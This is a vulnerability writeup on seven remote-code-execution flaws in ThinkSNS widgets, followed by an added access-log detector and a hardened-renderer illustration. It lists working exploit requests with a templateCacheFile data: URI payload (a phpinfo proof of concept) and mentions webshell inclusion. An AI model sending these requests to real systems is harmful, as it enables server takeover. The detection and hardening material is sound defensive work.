ThinkSNS, part three: seven front-end GetShell vulnerabilities
The vulnerability is in DenouceWidget.class.php:
\Addons\widget\DenouceWidget.class.php:23
    /**
     * Report pop-up box
     * @return string pop-up page HTML
     */
    public function index() {
        // get the relevant data
        $var = $this->getVar();
        $content = $this->renderFile(dirname(__FILE__) . "/index.html", $var);
        return $content;
    }
As you can see, the index() function obtains its parameters through $this->getVar() and then hands them to $this->renderFile(dirname(__FILE__) . "/index.html", $var) for template rendering and output.
First, look at $this->getVar():
\Addons\widget\DenouceWidget.class.php:56
    /**
     * Format the template variables
     * @return array report information
     */
    public function getVar() {
        if (empty($_GET['aid']) || empty($_GET['fuid']) || empty($_GET['type'])) {
            return false;
        }
        foreach ($_GET as $k => $v) {
            $var[$k] = t($v);
        }
        $var['uid'] = $GLOBALS['ts']['mid'];
        empty($var['app']) && $var['app'] = 'public';
        $var['source'] = model('source')->getSourceInfo($var['type'], $var['aid'], false, $var['app']);
        return $var;
    }
The foreach copies every key of $_GET into $var, and the merged array is returned.
Next, follow $this->renderFile(dirname(__FILE__) . "/index.html", $var):
\Core\OpenSociax\Widget.class.php:73
    /**
     * Render template output, for calls from the internal render method
     * @access public
     * @param string $templateFile template file
     * @param mixed  $var          template variables
     * @param string $charset      template encoding
     * @return string
     */
    protected function renderFile($templateFile = '', $var = '', $charset = 'utf-8') {
        $var['ts'] = $GLOBALS['ts'];
        if (!file_exists_case($templateFile)) {
            // automatically locate the template file
            // $name = substr(get_class($this), 0, -6);
            // $filename = empty($templateFile) ? $name : $templateFile;
            // $templateFile = 'widget/' . $name . '/' . $filename . C('TMPL_TEMPLATE_SUFFIX');
            // if (!file_exists_case($templateFile)) throw_exception(L('_WIDGET_TEMPLATE_NOT_EXIST_') . '[' . $templateFile . ']');
        }
        $template = $this->template ? $this->template : strtolower(C('TMPL_ENGINE_TYPE') ? C('TMPL_ENGINE_TYPE') : 'php');
        $content = fetch($templateFile, $var, $charset);
        return $content;
    }
The variables taken from the $_GET array are passed straight into fetch() for execution. fetch() has a variable-overwrite vulnerability, so a shell can be obtained.
For details of the fetch() vulnerability, see WooYun: ThinkPHP Remote Code Execution (specific conditions must be met).
Two ways to get a shell: include an image that contains a webshell, or use a filter.
/index.php?app=widget&mod=Denouce&act=index&aid=1&fuid=1&type=ztz&templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D
Six more spots work on the same principle:
1.
POST /index.php?app=widget&mod=Comment&act=addcomment&uid=1
app_name=public&table_name=user&content=test&row_id=1&app_detail_summary=1&templateCacheFile=data:text/plain;base64,signature%3D
2.
POST /index.php?app=widget&mod=Department&act=change
templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D
3.
POST /index.php?app=widget&mod=Diy&act=addWidget
templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D
4.
POST /index.php?app=widget&mod=FeedList&act=loadMore
templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D
5.
POST /index.php?app=widget&mod=FeedList&act=loadNew
templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D&maxId=1
6.
POST /index.php?app=widget&mod=Remark&act=edit
templateCacheFile=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyBleGl0KCk7Pz4%3D
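The seven requests above share one visible marker: a request parameter named templateCacheFile, which no legitimate ThinkSNS page sends. The following is an added detection example, not part of the original writeup, that scans access-log lines (constructed samples, no real hosts or traffic) for that parameter and reports whether the target is one of the seven widget endpoints listed and whether the value is a stream wrapper. Only the GET variant leaves the parameter in an access log; the six POST variants carry it in the request body, which needs a WAF or request-body logging to inspect.

```php
<?php
// Added detection example (not ThinkSNS code). Flags any request whose query
// string carries templateCacheFile, a name that belongs to the template
// renderer's internals and never to a legitimate request.

// mod/act pairs from the list of seven endpoints, lower-cased for comparison.
const WIDGET_ENDPOINTS = [
    'denouce/index', 'comment/addcomment', 'department/change',
    'diy/addwidget', 'feedlist/loadmore', 'feedlist/loadnew', 'remark/edit',
];

function inspectTarget(string $target): array
{
    $query = [];
    $qs = parse_url($target, PHP_URL_QUERY);
    if (is_string($qs)) {
        parse_str($qs, $query);
    }
    $q = array_change_key_case($query, CASE_LOWER);

    $endpoint = strtolower(($q['mod'] ?? '') . '/' . ($q['act'] ?? ''));
    $value    = isset($q['templatecachefile']) ? (string) $q['templatecachefile'] : null;

    return [
        'listed_endpoint'   => (($q['app'] ?? '') === 'widget') && in_array($endpoint, WIDGET_ENDPOINTS, true),
        'templatecachefile' => $value !== null,
        // data:, php://, file:// and remote schemes all indicate a value that
        // cannot be a legitimate compiled-template file on disk.
        'wrapper'           => $value !== null && preg_match('#^[a-z][a-z0-9+.-]*:#i', $value) === 1,
    ];
}

function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Common/combined log format: host ident user [time] "METHOD target PROTO" status ...
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;
        }
        [, $client, $time, $method, $target, $status] = $m;
        $r = inspectTarget($target);
        if (!$r['templatecachefile']) {
            continue;   // nothing renderer-related in the visible part of the request
        }
        $hits[] = [
            'client'   => $client,
            'time'     => $time,
            'method'   => $method,
            'status'   => (int) $status,
            'target'   => $target,
            'severity' => $r['wrapper'] ? 'high' : ($r['listed_endpoint'] ? 'medium' : 'low'),
        ];
    }
    return $hits;
}

// Constructed sample lines: one GET in the shape shown above (payload replaced
// by a placeholder), one benign widget request, one POST whose body is not
// visible here, and one templateCacheFile on an endpoint outside the list.
$sample = [
    '203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /index.php?app=widget&mod=Denouce&act=index&aid=1&fuid=1&type=ztz&templateCacheFile=data:text/plain;base64,PLACEHOLDER HTTP/1.1" 200 1532',
    '198.51.100.7 - - [10/Oct/2020:13:56:01 +0000] "GET /index.php?app=widget&mod=Denouce&act=index&aid=7&fuid=3&type=feed HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Oct/2020:13:57:12 +0000] "POST /index.php?app=widget&mod=Comment&act=addcomment&uid=1 HTTP/1.1" 200 310',
    '203.0.113.5 - - [10/Oct/2020:13:58:40 +0000] "GET /index.php?app=public&mod=Index&act=index&templateCacheFile=foo HTTP/1.1" 200 900',
];

foreach (scanAccessLog($sample) as $hit) {
    printf("[%s] %s %s %s -> %d\n", $hit['severity'], $hit['client'], $hit['method'], $hit['target'], $hit['status']);
}
```

The scan flags the first and fourth sample lines (high and low severity respectively), ignores the benign widget request, and cannot see the POST body of the third line; that blind spot is why the six POST variants need request-body inspection rather than access-log review. Matching on the parameter name rather than on the seven endpoints is deliberate: the underlying fetch() issue is reachable from any widget that forwards request parameters, so the list above is unlikely to be exhaustive.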
Solution:
Strengthen the input filtering.
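Filtering the values is only half of the fix; the root cause is that request parameter names become renderer variables. The following added illustration (not ThinkSNS or ThinkPHP code) reproduces the pattern described above with a minimal stand-in renderer: request parameters are merged into the template-variable array and extract()ed over the renderer's locals, so a key named templateCacheFile decides what gets included. The hardened variant beside it allowlists the parameters the widget actually uses, stops template variables from shadowing locals, and refuses any include path that is not a real file inside the cache directory. The function names, the cache-directory layout and the sample request are assumptions for the example; include() is represented by returning the path that would have been included.

```php
<?php
// Added illustration (not ThinkSNS or ThinkPHP code): a constructed minimal
// renderer showing the request-to-template-variable pattern from the writeup,
// followed by a hardened version of both halves.

// ---- Vulnerable pattern (constructed) -------------------------------------

function getVarVulnerable(array $get): array
{
    $var = [];
    // Every request key becomes a template variable, including names the
    // widget never expected.
    foreach ($get as $k => $v) {
        $var[$k] = htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
    }
    return $var;
}

function fetchVulnerable(string $templateFile, array $tVar, string $cacheDir): string
{
    $templateCacheFile = $cacheDir . '/' . md5($templateFile) . '.php';
    // EXTR_OVERWRITE lets $tVar['templateCacheFile'] replace the local just
    // computed, so the include would follow a request-controlled path.
    extract($tVar, EXTR_OVERWRITE);
    return $templateCacheFile;   // stands in for: include $templateCacheFile;
}

// ---- Hardened pattern -----------------------------------------------------

// Only the parameters this widget actually uses (assumed for the example).
const ALLOWED_PARAMS = ['aid', 'fuid', 'type', 'app'];

function getVarHardened(array $get): array
{
    $var = [];
    foreach (ALLOWED_PARAMS as $k) {
        if (isset($get[$k])) {
            $var[$k] = htmlspecialchars((string) $get[$k], ENT_QUOTES, 'UTF-8');
        }
    }
    return $var;
}

function fetchHardened(string $templateFile, array $tVar, string $cacheDir): string
{
    $templateCacheFile = $cacheDir . '/' . md5($templateFile) . '.php';

    // 1. Template variables must never shadow the renderer's own locals:
    //    drop reserved names, and use EXTR_SKIP so existing locals win anyway.
    foreach (['templateFile', 'templateCacheFile', 'tVar', 'cacheDir'] as $reserved) {
        unset($tVar[$reserved]);
    }
    extract($tVar, EXTR_SKIP);

    // 2. Include only a real file inside the cache directory. realpath()
    //    returns false for data:, php:// and other wrappers, and the prefix
    //    check rejects traversal out of $cacheDir.
    $realDir  = realpath($cacheDir);
    $realFile = realpath($templateCacheFile);
    if ($realDir === false || $realFile === false
        || strpos($realFile, $realDir . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template cache path rejected: ' . $templateCacheFile);
    }
    return $realFile;   // stands in for: include $realFile;
}

// ---- Demonstration with a constructed request -----------------------------

$cacheDir = sys_get_temp_dir() . '/tpl_cache_demo';
@mkdir($cacheDir);
file_put_contents($cacheDir . '/' . md5('index.html') . '.php', "<?php // compiled template\n");

// Constructed request: the widget's expected parameters plus an unexpected
// templateCacheFile carrying a placeholder data: URI.
$request = [
    'aid' => '1', 'fuid' => '1', 'type' => 'ztz',
    'templateCacheFile' => 'data:text/plain;base64,PLACEHOLDER',
];

echo "vulnerable would include: ", fetchVulnerable('index.html', getVarVulnerable($request), $cacheDir), "\n";
echo "hardened would include:   ", fetchHardened('index.html', getVarHardened($request), $cacheDir), "\n";
```

Run against the constructed request, the vulnerable pair returns the request-supplied data: URI as the include target, while the hardened pair returns the compiled template under the cache directory and never sees the templateCacheFile key at all. Either of the two hardening steps alone would stop this particular request; applying both means a widget that forgets the allowlist is still protected by the renderer, and a renderer that gains a new local is still protected by the allowlist.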